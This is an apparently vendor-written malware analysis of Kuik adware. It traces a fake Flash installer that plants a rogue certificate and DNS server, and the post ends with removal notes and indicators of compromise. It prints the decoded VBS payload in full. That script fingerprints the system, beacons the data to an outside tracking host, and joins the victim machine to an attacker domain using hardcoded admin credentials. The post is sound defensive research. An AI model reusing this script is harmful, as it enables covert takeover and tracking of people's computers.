Posted: May 8, 2018 by

Last updated:

Kuik adware, which forces affected machines to join a domain controller, is using this unusual technique to push Google Chrome extensions and coin miner applications. In this blog, we'll provide technical analysis of the adware and custom removal instructions.

Some pieces of malware can be so simple—and yet such a pain to get rid of—especially when they start interfering with your system’s configuration. This much is true for the Kuik adware program, which surprised us all by forcing affected machines to join a domain controller.

The perpetrators are using this unusual technique to push Google Chrome extensions and coin miner applications to their victims. In this blog, we’ll provide technical analysis of this adware and custom removal instructions.

Technical description

Stage 1 – .NET installer

0ba20fee958b88c48f3371ec8d8a8e5d

The first stage is written in .NET with an icon imitating the Adobe Flash Player. This is typical of bundlers that promise to update software components but also add their own code to the original installer.

After opening with a dotNet decompiler (i.e. dnSpy), we found that the project’s original name was WWVaper.

It has three resources inside:

a certificate (svr.crt)

a legitimate Flash (decoy)

a next stage component (upp.exe)

The certificate:

-----BEGIN CERTIFICATE----- MIIEZjCCA06gAwIBAgIJAPywkVD7m/9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNV BAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoM DEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0 QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczEL MAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMG A1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEW EHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB AQDMohZZUrsJOqXS1/eTpGGOMDxEE+YmRLmSU5h/K4tmnkr7Tv9cukICp/Xxnrci 5ONLdqgQFH1xLxLa6Xo+2X075NS0VjfMPx9WvYPSZ/T7uQQhb8Mc+ojjNoHK0JbD oPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55+aWAdPSIDcdqxMt1uFOcF0DY4y vHNpFw1xsjpYuvw1/MvwITr3A+PdKN9TIMzDgbXTZEtc7rWDah4HtIYSJZ2xwIcH qp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eX N6erGBkM7VTfJ5yM9Pxfcu+hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU 3F/U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F/U3InMEiuduPEMMAkG A1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3 LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5t ZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgB hvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcN AQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVm AC+3h1huSyqxYGbJQ8J3wLOYRZH+N5GOZUvjwrU+NY5KurWbMj6USMfsWfnnSXQi 0ADyjYZqtPMmIaIK86yPx4t+3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX 2g1YJAnjnq/9Ilt3MOCEpoCnUz5E+bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ0 2zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx+F3mepR01UMaiwEBDGIeSWX +joBVMKdqhFu9zChlN0dW0hbViIm+gDYsCQ= -----END CERTIFICATE-----

Details of the certificate:



The certificate points to a DNS name of yahoo.com. However, the certification path is invalid:

The .NET installer is responsible for installing the malicious certificate and other components. First, it enumerates the network interfaces and adds collected IPs to the list:

Then, it adds a new IP as a DNS (18.219.162.248) to the collected interfaces. It also installs its own certificate (svr.crt):

Stage 2 – upp.exe

This application is an installer bundle that is not obfuscated. Inside, we found a cabinet file:

It contains other modules to be dropped:

The application “install.exe” is deployed with the “setup.bat” as a parameter.

Stage 3 – unpacked components from the cabinet

The application install.exe is basic. Its only role is to run the next process in elevated mode. Below, you can see its main function:

The script setup.bat deploys another component named SqadU9FBEV.bat:

It delays execution by pinging 127.0.0.1. Then, it runs the second encoded script, giving it a campaign ID as a parameter:

The next element deployed is an encoded VBS script:

After decoding it (with this decoder), we saw this script in clear: NYkjVVXepl.vbs. We also saw that it fingerprints the system and beacons to a server:

Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem") for each System in SystemSet winVer = System.Caption next Function trackEvent(eventName, extraData) Set tracking = CreateObject("MSXML2.XMLHTTP") tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False tracking.send err.clear End Function

The interesting fragment is about adding the infected computer to a domain:

SET objNetwork = CREATEOBJECT("WScript.Network") strComputer = objNetwork.ComputerName SET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\\" & strComputer & "\root\cimv2:Win32_ComputerSystem.Name='" & strComputer & "'") ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.com\administrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE) If (ReturnValue 0) Or (err.number 0) Then trackEvent "join-domain-failed", ReturnValue WScript.Quit 1 Else trackEvent "join-domain-success", Null WScript.Quit 0 End IF

Payloads

There are a range of payloads being used by this program, but bogus Chrome extensions seem to be a particular favorite. In addition, some coin miners are being served:

Removal

Malwarebytes users (version 3.x) can remove this threat from their system by running a full scan. The removal includes unjoining the malicious domain controller to restore your machine to its original state.

Indicators of compromise

Kuik

b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686 990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e

Chrome extensions

d-and-h[.]com/fljlngkbcebmlpdlojnndahifaocnipb.crx d-and-h[.]com/123.crx d-and-h[.]com/jpfhjoeaokamkacafjdjbjllgkfkakca.crx d-and-h[.]com/mmemdlochnielijcfpmgiffgkpehgimj.crx kuikdelivery[.]com/emhifpfmcmoghejbfcbnknjjpifkmddc.crx tripan[.]me/kdobijehckphahlmkohehaciojbpmdbp.crx

Payloads

92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B751 33D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB735968501268 7889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD 761D62A22AE73307C679B096030BF0EEC93555E13DC820931519183CAA9F1B2A 871AD057247C023F68768724EBF23D00EF842F0B510A3ACE544A8948AE775712